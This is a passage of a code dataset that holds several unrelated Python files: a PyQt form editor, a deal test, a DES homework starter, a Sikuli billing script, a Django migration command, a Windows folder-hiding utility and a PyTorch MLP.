metaItem(name,fieldName,ctrl,\"float\")\n\t\tm.precision = precision\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.min = min\n\t\tm.max = max\n\t\tm.meta = self\n\t\tself.fields[fieldName] = m\n\t\treturn m\n\t\t\n\t#values为[(1,\"xxx1\"),(2,\"xxx2\")]的列表 \n\tdef addSelect(self,name,fieldName,items,ctrl=PyQt5.QtWidgets.QComboBox,readonly=False,isCheckble=False):\n\t\tassert fieldName not in self.fields\n\t\tm = metaItem(name,fieldName,ctrl,\"select\")\n\t\tm.readonly = readonly\n\t\tm.isCheckble = isCheckble\n\t\tm.items = items\n\t\tself.fields[fieldName] = m\n\t\tm.meta = self\n\t\treturn m\n \t\t\n\tdef addNewLine(self):\n\t\tself.fields[uuid.uuid1()] = \"newLine\"\n\t\n\tdef addSpace(self):\n\t\tself.fields[uuid.uuid1()] = \"space\"\n\t\t\n\tdef addGroup(self,name):\n\t\tself.fields[uuid.uuid1()] = name\n\t\t\n\tdef __len__(self):\n\t\treturn len(self.fields)\n\t\t\n\tdef __iter__(self):\n\t\tfor item in self.fields:\n\t\t\tyield self.fields[item]\n\t\t\t\n\tdef 
clearModified(self):\n\t\tfor f in self:\n\t\t\tif not isinstance(f,str):\n\t\t\t\tf.isModified = False\n\t\n\tdef save(self,fileName):\n\t\tff = []\n\t\tfor f in self.fields:\n\t\t\tf = self.fields[f]\n\t\t\tif isinstance(f,str): #newline,space \n\t\t\t\tff.append(f)\n\t\t\telse:\n\t\t\t\tff.append(f.saveData())\n\t\tr = {}\n\t\tr[\"title\"] = self.title\n\t\tr[\"iconName\"] = self.iconName\n\t\tr[\"fields\"] = ff\n\t\tr[\"primaryKeys\"] = list(self.primaryKeys)\n\t\tr[\"objType\"] = enhance.typeName(self.objType)\n\t\tr[\"fontSize\"] = self.fontSize\n\t\tif self.attributes:\n\t\t\tr[\"attributes\"] = self.attributes\n\t\tjson.dump_file(fileName,r)\n\t\n\t@staticmethod\n\tdef load(fileName):\n\t\tmm = metaData(None,None,None)\n\t\tr = json.load_file(fileName)\n\t\tmm.title = r[\"title\"]\n\t\tmm.iconName = r[\"iconName\"]\n\t\tif \"fontSize\" in r:\n\t\t\tmm.fontSize = r[\"fontSize\"]\n\t\tff = collections.OrderedDict()\n\t\tfor f in r[\"fields\"]:\n\t\t\tif isinstance(f,str):\t#newline,space,group \n\t\t\t\tff[uuid.uuid1()] = f\n\t\t\telse:\n\t\t\t\tm = metaItem.loadData(f)\n\t\t\t\tm.meta = mm\n\t\t\t\tif m.fieldName in ff:\n\t\t\t\t\tprint(\"repeat fieldName\",m.fieldName,ff)\n\t\t\t\tassert m.fieldName not in ff\n\t\t\t\tff[m.fieldName] = m\n\t\tmm.fields = ff\n\t\tmm.objType = enhance.getType(r[\"objType\"])\n\t\tmm.primaryKeys = set(r[\"primaryKeys\"])\n\t\tif \"attributes\" in r:\n\t\t\tmm.attributes = r[\"attributes\"]\n\t\treturn mm\n\t\t\n\nclass editWidget(PyQt5.QtWidgets.QWidget): \n\tdef __init__(self,obj,meta,editable):\n\t\tsuper(editWidget, self).__init__() \n\t\tself.changedCallbacks = {}\n\t\tself.enableCallbacks = {}\n\t\tself.meta = meta\n\t\tself._editable = editable\n\t\tself.ctrls = {}\t\n\t\tll = QVBoxLayout()\n\t\tself.setLayout(ll)\n\t\tself.createCtrls(obj)\n\t\tself.currentID = None\n\t\t\n\t\t\n\tdef onChanged(self,ctrl,label,event):\n\t\tif not self._editable:\n\t\t\treturn\n\t\tif ctrl.meta.value(ctrl) != ctrl.oldValue:\n\t\t\tctrl.isModified = True\n\t\t\t_setModified(label)\n\t\telse:\n\t\t\tctrl.isModified = False\n\t\t\t_clearModified(label)\n\t\tif ctrl.meta.fieldName in self.changedCallbacks:\n\t\t\tself.changedCallbacks[ctrl.meta.fieldName](ctrl.meta.fieldName,ctrl.meta.value(ctrl))\n\n\tdef onEnableChanged(self, ctrl, cb, event):\n\t\tif not self._editable:\n\t\t\treturn\n\t\tctrl.setEnabled(cb.isChecked())\n\t\tif ctrl.meta.fieldName in self.enableCallbacks:\n\t\t\tself.enableCallbacks[ctrl.meta.fieldName](ctrl.meta.fieldName, cb.isChecked())\n\n\tdef createLayout(self,layoutClass=QVBoxLayout,editable=True):\n\t\tctrls = {}\n\t\tmainLayout = layoutClass()\n\t\tmainLayout.setSpacing(20)\n\t\tmainLayout.setAlignment(Qt.AlignTop)\n\t\tl = None\n\t\tgroup = None\n\t\tfor f in self.meta:\n\t\t\tif isinstance(f,str):\n\t\t\t\tif f == \"newLine\":\n\t\t\t\t\tl = QFormLayout()\n\t\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\t\tl.setSpacing(10) \n\t\t\t\t\tmainLayout.addLayout(l)\n\t\t\t\telif f == \"space\":\n\t\t\t\t\tq = QWidget()\n\t\t\t\t\tq.setFixedSize(20,20)\n\t\t\t\t\tl.addRow(q)\n\t\t\t\telse:\n\t\t\t\t\tgroup = PyQt5.QtWidgets.QGroupBox(f)\n\t\t\t\t\tfont = group.font()\n\t\t\t\t\tfont.setPointSize(self.meta.fontSize)\n\t\t\t\t\tgroup.setFont(font) \n\t\t\t\t\t#group.setCheckable(True)\n\t\t\t\t\tl = QFormLayout()\n\t\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\t\tl.setSpacing(10) \n\t\t\t\t\tgroup.setLayout(l)\n\t\t\t\t\tmainLayout.addWidget(group)\n\t\t\t\tcontinue\n\t\t\tif l is None:\n\t\t\t\tl = 
QFormLayout()\n\t\t\t\tl.setFormAlignment(Qt.AlignHCenter | Qt.AlignTop)\n\t\t\t\tl.setSpacing(10) \n\t\t\t\tmainLayout.addLayout(l)\n\t\t\tc,labels,cbs = f.addCtrl(l,editable=editable)\n\t\t\tif c:\n\t\t\t\tif isinstance(c,tuple):\n\t\t\t\t\t#c[0].meta = f\n\t\t\t\t\tfor i,cc in enumerate(c):\n\t\t\t\t\t\tcc.meta = f\n\t\t\t\t\t\tcc.label = labels[i]\n\t\t\t\t\t\tcc.cb = cbs[i]\n\t\t\t\t\t\tcc.oldValue = cc.meta.value(cc)\n\t\t\t\t\t\tcc.isModified = False\n\t\t\t\t\t\tqtutility.setChangedEvent(cc,enhance.bind(self.onChanged,cc,labels[i]))\n\t\t\t\t\t\tqtutility.setChangedEvent(cc.cb,enhance.bind(self.onEnableChanged,cc,cc.cb))\n\t\t\t\telse:\n\t\t\t\t\tc.meta = f\n\t\t\t\t\tc.label = labels\n\t\t\t\t\tc.cb = cbs\n\t\t\t\t\tc.oldValue = c.meta.value(c)\n\t\t\t\t\tc.isModified = False\n\t\t\t\t\tqtutility.setChangedEvent(c,enhance.bind(self.onChanged,c,labels))\n\t\t\t\t\tqtutility.setChangedEvent(c.cb, enhance.bind(self.onEnableChanged, c, c.cb))\n\n\t\t\t\tctrls[f.fieldName] = c \n\t\treturn (mainLayout,ctrls)\n\t\n\tdef createCtrls(self,obj):\n\t\tqtutility.clearLayout(self.layout())\n\t\tl,self.ctrls = self.createLayout(editable=self.editable)\n\t\tself.layout().addLayout(l)\n\t\tself.setValue(obj)\n\t\treturn l\n\t\t\n\tdef check(self,manager=None):\n\t\tfor item in self.meta:\n\t\t\tif isinstance(item,str):\n\t\t\t\tcontinue\n\t\t\tmsg = item.check(self.ctrls[item.fieldName])\n\t\t\tif msg:\n\t\t\t\tlog.warning(msg)\n\t\t\t\treturn msg\n\t\t\tif manager:\n\t\t\t\tmsg = manager.checkRepeat(self.getObj())\n\t\t\t\tif msg:\n\t\t\t\t\tlog.warning(msg)\n\t\t\t\t\treturn msg\n\t\treturn \"\"\n\t\t\n\tdef setValue(self,obj): \n\t\tassert isinstance(obj,self.meta.objType)\n\t\tif hasattr(obj,\"id\"):\n\t\t\tself.currentID = obj.id\n\t\tif isinstance(obj,dict):\n\t\t\tif \"id\" in obj:\n\t\t\t\tself.currentID = obj[\"id\"]\n\t\t\t\t\n\t\tfor key in self.ctrls:\n\t\t\tcc = self.ctrls[key]\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tif self.editable:\n\t\t\t\t\tv = cc[0].meta.value(obj)\n\t\t\t\telse:\n\t\t\t\t\tv = cc[0].meta.valueStr(obj)\n\t\t\t\tfor c in cc:\n\t\t\t\t\tqtutility.setValue(c,v) \n\t\t\telse:\n\t\t\t\tif self.editable:\n\t\t\t\t\tv = cc.meta.value(obj)\n\t\t\t\telse:\n\t\t\t\t\tv = cc.meta.valueStr(obj)\n\t\t\t\tqtutility.setValue(cc,v) \n\t\tself.obj = obj\n\t\tself.clearModified()\n\t\treturn obj\n\t\t\n\tdef getCtrl(self,name):\n\t\tc = self.ctrls[name]\n\t\tif isinstance(c,tuple):\n\t\t\treturn c[0]\n\t\treturn c\n\t\t\n\tdef getValue(self,name):\n\t\tc = self.getCtrl(name)\n\t\treturn c.meta.value(c)\n\t\t\t\n\tdef setItem(self,name,value):\n\t\t# assert self.editable\n\t\tc = self.getCtrl(name)\n\t\tif not self.editable:\n\t\t\tvalue = c.meta.valueStr({name: value})\n\t\tqtutility.setValue(c,value)\n\n\tdef setValueEnabled(self,name,value):\n\t\tc = self.getCtrl(name)\n\t\tqtutility.setValue(c.cb,value)\n\t\t\n\tdef getObj(self,modifiedOnly=False): \n\t\treturn self._get(self.meta.objType(),modifiedOnly=modifiedOnly)\n\t\t\n\tdef getDict(self,modifiedOnly=False):\n\t\treturn self._get({},modifiedOnly=modifiedOnly)\n\t\t\n\tdef _get(self,obj,modifiedOnly):\n\t\tif self.currentID is not None:\n\t\t\tutility.set_attr(obj,\"id\",self.currentID)\n\t\tfor key in self.ctrls:\n\t\t\tcc = self.ctrls[key]\n\t\t\tb = False\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tv = cc[0].meta.value(cc[0])\n\t\t\t\tb = cc[0].isModified or cc[1].isModified\n\t\t\telse:\n\t\t\t\tb = cc.isModified\n\t\t\t\tv = cc.meta.value(cc)\n\t\t\tif modifiedOnly and not 
b:\n\t\t\t\tcontinue\n\t\t\tutility.set_attr(obj,key,v)\n\t\treturn obj\n\t\t\n\t@property\n\tdef editable(self):\n\t\treturn self._editable\n\t\n\t@editable.setter\n\tdef editable(self,v):\n\t\tself._editable = v\n\t\tself.createCtrls(self.obj)\n\t\t\n\tdef clearModified(self):\n\t\tlabels = []\n\t\tfor cc in self.ctrls:\n\t\t\tcc = self.ctrls[cc]\n\t\t\tif isinstance(cc,tuple):\n\t\t\t\tfor c in cc:\n\t\t\t\t\tc.oldValue = c.meta.value(c)\n\t\t\t\t\tc.isModified = False\n\t\t\t\t\tlabels.append(c.label)\n\t\t\telse:\n\t\t\t\tcc.oldValue = cc.meta.value(cc)\n\t\t\t\tcc.isModified = False\n\t\t\t\tlabels.append(cc.label)\n\t\tfor label in labels:\n\t\t\t_clearModified(label)\n\t\n\tdef setChangedEvent(self,name,callback):\n\t\tself.changedCallbacks[name] = callback\n\n\tdef setEnableChangedEvent(self,name,callback):\n\t\tself.enableCallbacks[name] = callback\n\nclass editDlg(QDialog):\n\tdef __init__(self,obj,meta,manager=None,editable=False):\n\t\tsuper(editDlg, self).__init__()\n\t\tself.setWindowFlags(Qt.WindowCloseButtonHint)\n\t\tself.ctrl = editWidget(obj,meta,editable=editable)\n\t\tself.ctrl.setChangedEvent(\"ddd\", self.ondddChanged)\n\t\tself.ctrl.setEnableChangedEvent(\"ddd\", self.ondddEnableChanged)\n\t\tself.ctrl.setChangedEvent(\"bbb\", self.ondddChanged)\n\t\tself.ctrl.setEnableChangedEvent(\"bbb\", self.ondddEnableChanged)\n\t\tself.manager = manager\n\t\tif meta.iconName:\n\t\t\tself.setWindowIcon(qta.icon(meta.iconName,color='white'))\n\t\tif \"width\" in meta.attributes:\n\t\t\tw = meta.attributes[\"width\"]\n\t\telse:\n\t\t\tw = 600\n\t\tif \"height\" in meta.attributes:\n\t\t\th = meta.attributes[\"height\"]\n\t\telse:\n\t\t\th = max(len(meta)*50,150)\n\t\tself.setFixedWidth(w)\t\t\n\t\tself.setFixedHeight(h)\t\t\n\t\t\n\t\tll = QVBoxLayout()\n\t\tll.addWidget(self.ctrl)\n\t\tll.addLayout(self.createBtns())\n\t\tself.setLayout(ll)\n\t\tself.setValue(obj)\n\t\tself.setWindowTitle(\"新建\"+meta.title) \n\t\t\n\t@property\n\tdef currentID(self):\n\t\t# delegate to the embedded editWidget; returning self.currentID here would recurse forever\n\t\treturn self.ctrl.currentID\n\t\t\n\tdef createBtns(self):\n\t\tl2 = QHBoxLayout()\n\t\tl2.addStretch(1) \n\t\tl2.setSpacing(20)\n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.edit\",scale_factor=1.1,color=\"blue\"),\"编辑\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.edit)\n\t\tb.setFixedWidth(80)\n\t\tl2.addWidget(b)\n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.check\",scale_factor=1.5,color=\"green\"),\"确定\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.accept)\n\t\tb.setFixedWidth(80)\n\t\tself.okBtn = b\n\t\tl2.addWidget(b) \n\t\t\n\t\tb = QPushButton(qta.icon(\"fa.remove\",scale_factor=1.5,color=\"red\"),\"取消\")\n\t\tb.setMinimumHeight(40)\n\t\tb.clicked.connect(self.reject)\n\t\tb.setFixedWidth(80)\n\t\tl2.addWidget(b)\n\t\treturn l2 \n\t\t\n\tdef edit(self):\n\t\tself.ctrl.editable = not self.ctrl.editable\n\t\t\n\tdef accept(self):\n\t\tmsg = self.ctrl.check(self.manager)\n\t\tif msg:\n\t\t\tqtutility.showWaring(msg)\n\t\t\treturn\n\t\tsuper(editDlg, self).accept()\n\t\t\n\tdef setValue(self,obj): \n\t\tself.ctrl.setValue(obj)\n\t\tself.setWindowTitle(\"编辑\"+self.ctrl.meta.title)\t\n\t\treturn obj\n\t\t\n\tdef getObj(self,modifiedOnly): \n\t\treturn self.ctrl.getObj(modifiedOnly=modifiedOnly)\n\t\t\n\tdef getDict(self,modifiedOnly):\n\t\treturn self.ctrl.getDict(modifiedOnly=modifiedOnly)\n\n\tdef ondddEnableChanged(self, obj, value):\n\t\tif str(obj)=='bbb':\n\t\t\tself.ctrl.setValueEnabled('ddd',True)\n\t\tprint('{0}选择框改变了:{1}'.format(str(obj),value))\n\n\tdef ondddChanged(self, obj, 
value):\n\t\tprint('{0}的值改变了:{1}'.format(str(obj),value))\n\ndef show(filename):\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tm = metaData.load(filename)\t\n\td = editDlg({},m) \n\td.show() \n\tsys.exit(app.exec_())\n\n########### unit test ###########\ndef test():\n\ta = scramble\n\tm = metaData(dict,\"测试对话框\")\n\tm.addInt(\"字段int\",\"aaa\",min=10,max=20,isCheckble=True)\n\tm.addText(\"字段text\",\"bbb\",maxSize=12,isCheckble=True)\n\t#m.addNewLine()\n\ta= m.addFloat(\"字段float\",\"ddd\",isCheckble=True)\n\ta.tooltip = \"字段fffffffffloooooooat\"\n\tm2 = m.addSelect(\"字段select\",\"eee\",[(0,\"item0\"),(1,\"item1\"),(2,\"item2\"),(4,\"item4\")])\n\tm2._defaultValue=2\n\t\n\tm.addGroup(\"test2\")\n\tm.addBool(\"字段bool\",\"cccbb\",falseText=\"禁用\",trueText=\"启用\")\n\tm.addGroup(\"test1\")\n\tm.addPwd(\"字段pwd\",\"ccc\")\n\tm.setPrimary(\"aaa\")\n\tm.save(\"test/testmeta.json\")\n\t\n\tvv = {'aaa': 12, 'bbb': '13', \n\t\t 'ccc': '2f71758b439918d452c641d9236ffd61', \n\t\t 'ddd': 16.0, 'eee': 1, 'cccbb': True}\n\t\n\tapp = PyQt5.QtWidgets.QApplication(sys.argv)\n\tm2 = metaData.load(\"test/testmeta.json\")\t\n\td = editDlg({},m2) \n\td.setValue(vv)\n\td.show() \n\tapp.exec_()\n\tprint(\"modified:\",d.getDict(True))\n\tsys.exit()\n\t\nif __name__ == '__main__': \n\t# show(\"./area_meta.json\")\n\ttest()\n\t\n\t\n\t\n\t\n\t\n\t\n\t","sub_path":"akmAOI/common/ui/meta.py","file_name":"meta.py","file_ext":"py","file_size_in_byte":21818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"107398622","text":"# external\nimport pytest\n\n# project\nimport deal\n\n# app\nfrom .helpers import run_sync\n\n\ndef test_silent_contract_not_allow_print():\n @deal.silent\n def func(msg):\n if msg:\n print(msg)\n\n func(None)\n with pytest.raises(deal.SilentContractError):\n func('bad')\n\n\ndef test_decorating_async_function():\n @deal.silent\n async def func(msg):\n if msg:\n print(msg)\n return msg\n\n assert run_sync(func('')) == ''\n with pytest.raises(deal.SilentContractError):\n run_sync(func('a'))\n\n\ndef test_decorating_generator():\n @deal.silent\n def func(msg):\n if msg:\n print(msg)\n yield msg\n\n assert list(func('')) == ['']\n with pytest.raises(deal.SilentContractError):\n list(func('a'))\n","sub_path":"tests/test_decorators/test_silent.py","file_name":"test_silent.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"59806279","text":"#!/usr/bin/env python\n\n### hw2_starter.py\n\nimport sys\nfrom BitVector import *\n\n\nexpansion_permutation = [31, 0, 1, 2, 3, 4, 3, 4, 5, 6, 7, 8, 7, 8, 9, 10, 11, 12, 11, 12, 13, 14, 15, 16, 15, 16, 17, 18, 19, 20, 19, 20, 21, 22, 23, 24, 23, 24, 25, 26, 27, 28, 27, 28, 29, 30, 31, 0]\n\nkey_permutation_1 = [56,48,40,32,24,16,8,0,57,49,41,33,25,17,\n 9,1,58,50,42,34,26,18,10,2,59,51,43,35,\n 62,54,46,38,30,22,14,6,61,53,45,37,29,21,\n 13,5,60,52,44,36,28,20,12,4,27,19,11,3]\n\nkey_permutation_2 = [13,16,10,23,0,4,2,27,14,5,20,9,22,18,11,\n 3,25,7,15,6,26,19,12,1,40,51,30,36,46,\n 54,29,39,50,44,32,47,43,48,38,55,33,52,\n 45,41,49,35,28,31]\n\nshifts_for_round_key_gen = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]\n\n\ndef generate_round_keys(encryption_key):\n round_keys = []\n key = encryption_key.deep_copy()\n for round_count in range(16):\n [LKey, RKey] = key.divide_into_two()\n shift = shifts_for_round_key_gen[round_count]\n LKey << shift\n RKey << shift\n key = LKey + RKey\n round_key = key.permute(key_permutation_2)\n 
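# per the DES key schedule, PC-2 (key_permutation_2) compresses the shifted 56-bit key into a 48-bit round key\n        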
round_keys.append(round_key)\n    return round_keys\n\n\ndef get_encryption_key():\n    key = \"\"\n    while True:\n        if sys.version_info[0] == 3:\n            key = input(\"\\nEnter a string of 8 characters for the key: \")\n        else:\n            key = raw_input(\"\\nEnter a string of 8 characters for the key: \")\n        if len(key) != 8:\n            print(\"\\nKey generation needs 8 characters exactly. Try again.\\n\")\n            continue\n        else:\n            break\n    key = BitVector(textstring = key)\n    key = key.permute(key_permutation_1)\n    return key\n\ndef encrypt():\n    key = get_encryption_key()\n    round_keys = generate_round_keys(key)\n    # BitVector's constructor takes keyword arguments; pass the input file as filename=\n    bv = BitVector(filename = 'filename.txt')\n    while bv.more_to_read:\n        bitvec = bv.read_bits_from_file( 64 )\n        if bitvec.getsize() > 0:\n            [LE, RE] = bitvec.divide_into_two()\n            newRE = RE.permute( expansion_permutation )\n            # XOR via BitVector's ^ operator; this single-round starter uses the first round key\n            out_xor = newRE ^ round_keys[0]\n\n            '''\n            now comes the hard part --- the substitution boxes\n\n            Let's say after the substitution boxes and another\n            permutation (P in Section 3.3.4), the output for RE is\n            RE_modified.\n\n            When you join the two halves of the bit string\n            again, the rule to follow (from Fig. 4 on page 21) is\n            either\n\n            final_string = RE followed by (RE_modified xored with LE)\n\n            or\n\n            final_string = LE followed by (LE_modified xored with RE)\n\n            depending upon whether you prefer to do the substitutions\n            in the right half (as shown in Fig. 4) or in the left\n            half.\n\n            The important thing to note is that the swap between the\n            two halves shown in Fig. 4 is essential to the working\n            of the algorithm even in a single-round implementation\n            of the cipher, especially if you want to use the same\n            algorithm for both encryption and decryption (see Fig.\n            3 page 15). The two rules shown above include this swap.\n            '''\n","sub_path":"HW2/hw2_starter.py","file_name":"hw2_starter.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"499008235","text":"from sikuli import *\nimport logging\nimport myTools\nfrom datetime import date\nimport reports_Compare\n\n#---------------------------------------------------#\ndef fSet_BillDate(pMonth):\n#---------------------------------------------------#\n\n    if pMonth == 13:\n        pMonth = 12 \n\n    logging.debug('- change bill date: ' + str(pMonth) + \"/27/\" + Settings.dataYear)\n    time.sleep(1)\n\n    # make sure timeslips has focus\n    myTools.getFocus()\n\n    # open revise date\n    type(\"b\",KeyModifier.ALT)\n    type(\"d\") \n    time.sleep(2)\n\n    # go to today\n    type(\"t\")\n\n    #get to 01/01 of current year\n    type(Key.HOME,KeyModifier.CTRL) \n\n    # get to 01/01 of the data year\n    thisYear = date.today().year\n    for prevYear in range(int(Settings.dataYear),thisYear):\n        type(Key.PAGE_UP,KeyModifier.CTRL) \n        time.sleep(1)\n\n    # get to 01/27 of the data year\n    myTools.pressDOWN(4)\n    myTools.pressLEFT(2) \n\n    for nextMonth in range(pMonth-1):\n        type(Key.PAGE_DOWN) \n        time.sleep(1)\n    \n    type(Key.ENTER)\n    time.sleep(1) \n\n#---------------------------------------------------#\ndef fRemove_Sort():\n#---------------------------------------------------#\n\n    time.sleep(1)\n    logging.debug('- remove sort')\n    \n    type(Key.F6)\n    time.sleep(1)\n\n    click(Pattern(\"remove_sort-1.png\").similar(0.80))\n    time.sleep(1)\n    \n    type(Key.F6)\n    time.sleep(1)\n\n#---------------------------------------------------#\ndef fPrint_BillRun(pMonth):\n#---------------------------------------------------#\n    \n    reportName = \"Bill-\" + myTools.padZero(pMonth) + \"-\" + Settings.tsVersion + \".txt\" \n    
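# illustrative example (assuming myTools.padZero zero-pads to two digits): month 3 on version 2016 -> \"Bill-03-2016.txt\"\n    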
logging.debug('fPrint_BillRun: ' + reportName)\n\n    type(\"b\",KeyModifier.CTRL)\n    time.sleep(1)\n\n    fRemove_Sort()\n    myTools.enterSlipFilter(pMonth,\"n\")\n\n    # print bills to text\n    logging.debug('-- print') \n    type(Key.ENTER) \n    time.sleep(1)\n\n    # fill in path and name; press ENTER\n    type(Settings.repFolder + \"\\\\\" + reportName)\n    time.sleep(1)\n    type(Key.ENTER) \n    time.sleep(1)\n\n    if exists(\"replace_msg.png\"):\n        type(\"y\")\n\n    # approve bills\n    logging.debug('-- approve') \n    wait(Pattern(\"approve_bills-1.png\").targetOffset(-100,-8),FOREVER)\n    click(Pattern(\"approve_bills-1.png\").targetOffset(-100,-8))\n    type(Key.ENTER)\n    time.sleep(3)\n\n    if int(Settings.tsVersion) > 2015:\n        wait(\"approving_bills.png\",FOREVER) \n        while exists(\"approving_bills.png\"):\n            logging.debug('--- msg exists')\n            time.sleep(2)\n    else:\n        waitVanish(\"approving_statusbar.png\",FOREVER) \n        time.sleep(1)\n\n    # compare the report with baseline\n    reports_Compare.Compare_OneReport(reportName)\n\n    # close report entry / don't save\n    logging.debug('-- close report window')\n    click(\"report_generate_bills.png\")\n    type(Key.F4,KeyModifier.CTRL)\n    time.sleep(2)\n    type(\"n\") \n    time.sleep(1)\n\n#---------------------------------------------------#\ndef fPrint_Bills(pMonth):\n#---------------------------------------------------#\n\n    myTools.sectionStartTimeStamp(\"bills\" + str(pMonth))\n    logging.debug('Print_Bills: ' + str(pMonth))\n    \n    fSet_BillDate(pMonth)\n    fPrint_BillRun(pMonth)\n    myTools.sectionEndTimeStamp()\n","sub_path":"bill_Print.sikuli/bill_Print.py","file_name":"bill_Print.py","file_ext":"py","file_size_in_byte":3270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"273878972","text":"import argparse\nimport sys\nfrom typing import List, Union\n\nimport django\nfrom django.apps import apps\nfrom django.core.management.commands.makemigrations import Command as BaseCommand\n\nfrom django_linear_migrations.apps import MigrationDetails, first_party_app_configs\n\n\nclass Command(BaseCommand):\n    help = \"Generate max_migration.txt files for first-party apps.\"\n\n    # Checks disabled because django-linear-migrations' own checks would\n    # prevent us from continuing\n    requires_system_checks: Union[bool, List[str]]\n    if django.VERSION < (3, 2):\n        requires_system_checks = False\n    else:\n        requires_system_checks = []\n\n    def add_arguments(self, parser: argparse.ArgumentParser) -> None:\n        parser.add_argument(\n            \"args\",\n            metavar=\"app_label\",\n            nargs=\"*\",\n            help=\"Specify the app label(s) to create max migration files for.\",\n        )\n        parser.add_argument(\n            \"--dry-run\",\n            action=\"store_true\",\n            default=False,\n            help=\"Show which files would be created without actually creating them.\",\n        )\n        parser.add_argument(\n            \"--recreate\",\n            action=\"store_true\",\n            default=False,\n            help=(\n                \"Recreate existing files. 
By default only non-existing files\"\n                + \" will be created.\"\n            ),\n        )\n\n    def handle(\n        self, *app_labels: str, dry_run: bool, recreate: bool, **options: object\n    ) -> None:\n        # Copied check from makemigrations\n        labels = set(app_labels)\n        has_bad_labels = False\n        for app_label in labels:\n            try:\n                apps.get_app_config(app_label)\n            except LookupError as err:\n                self.stderr.write(str(err))\n                has_bad_labels = True\n        if has_bad_labels:\n            sys.exit(2)\n\n        any_created = False\n        for app_config in first_party_app_configs():\n            if labels and app_config.label not in labels:\n                continue\n\n            migration_details = MigrationDetails(app_config.label)\n            if not migration_details.has_migrations:\n                continue\n\n            max_migration_txt = migration_details.dir / \"max_migration.txt\"\n            if recreate or not max_migration_txt.exists():\n                if not dry_run:\n                    max_migration_name = max(migration_details.names)\n                    max_migration_txt.write_text(max_migration_name + \"\\n\")\n                    self.stdout.write(\n                        f\"Created max_migration.txt for {app_config.label}.\"\n                    )\n                else:\n                    self.stdout.write(\n                        \"Would create max_migration.txt for {}.\".format(\n                            app_config.label\n                        )\n                    )\n                any_created = True\n\n        if not any_created:\n            self.stdout.write(\"No max_migration.txt files need creating.\")\n","sub_path":"src/django_linear_migrations/management/commands/create_max_migration_files.py","file_name":"create_max_migration_files.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"394348609","text":"dictionary = {}\n\nwords_definitions = input().split(\" | \")\nfor word_definition in words_definitions:\n    word, definition = word_definition.split(\": \")\n    if word not in dictionary:\n        dictionary[word] = []\n\n    dictionary[word] += [definition]\n\n\nwords = input().split(\" | \")\nfor word in words:\n    if word in dictionary:\n        print(word)\n        print(\" -\" + '\\n -'.join(sorted(dictionary[word], key=lambda x: -len(x))))\n\n\ncommand = input()\nif command == \"List\":\n    print(' '.join(sorted(dictionary.keys())))\n","sub_path":"Final Exam Preparation/dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"103320677","text":"import ctypes\n\npasta = input(\"Enter the path of the folder to hide, e.g. (C:\\pasta): \" )\natributo_ocultar = 0x02 # FILE_ATTRIBUTE_HIDDEN, in hexadecimal\n\n# apply the hidden attribute to the path the user entered (the original passed the hard-coded name \"ocultar.txt\" and ignored pasta)\nretorno = ctypes.windll.kernel32.SetFileAttributesW(pasta, atributo_ocultar)\n\nif retorno:\n    print (\"The folder was hidden\")\nelse:\n    print (\"The folder was not hidden\")","sub_path":"ocultadordeArquivos/ocultadordeArquivos.py","file_name":"ocultadordeArquivos.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"401349528","text":"import torch\nfrom torch import nn  # imports added so this snippet runs standalone\n\n\nclass Net(nn.Module):\n    def __init__(self, actv, input_feature_num, hidden_unit_nums, output_feature_num):\n        super(Net, self).__init__()\n\n        # Assign activation function (eval allows us to instantiate object from string)\n        self.actv = eval('nn.%s'%actv)\n\n        # save the input size for later\n        self.input_feature_num = input_feature_num\n\n        # Initialize layers of MLP\n        self.layers = nn.Sequential()\n\n        # Loop over layers and create each one\n        for i in range(len(hidden_unit_nums)):\n            # assign the current layer output feature numbers from hidden layer list\n            next_input_feature_num = hidden_unit_nums[i]\n            # use nn.Linear to define the layer\n            
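# e.g. hidden_unit_nums=[100, 10, 5] with input_feature_num=2 (as in the test at the bottom) builds Linear(2,100), Linear(100,10), Linear(10,5)\n            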
layer = nn.Linear(input_feature_num, next_input_feature_num)\n # append it to the model with a name\n self.layers.add_module('Linear%d'%i, layer)\n # assign next layer input using current layer output\n input_feature_num = next_input_feature_num\n\n # Create final layer\n self.out = nn.Linear(input_feature_num, output_feature_num)\n\n def forward(self, x):\n # reshape inputs to (batch_size, input_feature_num)\n # just in case the input vector is not 2D, like an image!\n x = x.view(-1, self.input_feature_num)\n # get each layer and run it on previous output and apply the activation function\n for layer in self.layers:\n x = self.actv(layer(x))\n\n # Get outputs\n x = self.out(x)\n\n return x\n\n\ninput = torch.zeros((100, 2))\n## Uncomment below to create network and test it on input\nnet = Net(actv='LeakyReLU(0.1)', input_feature_num = 2,\n hidden_unit_nums = [100, 10, 5], output_feature_num = 1)\ny = net(input)\nprint(f'The output shape is {y.shape} for an input of shape 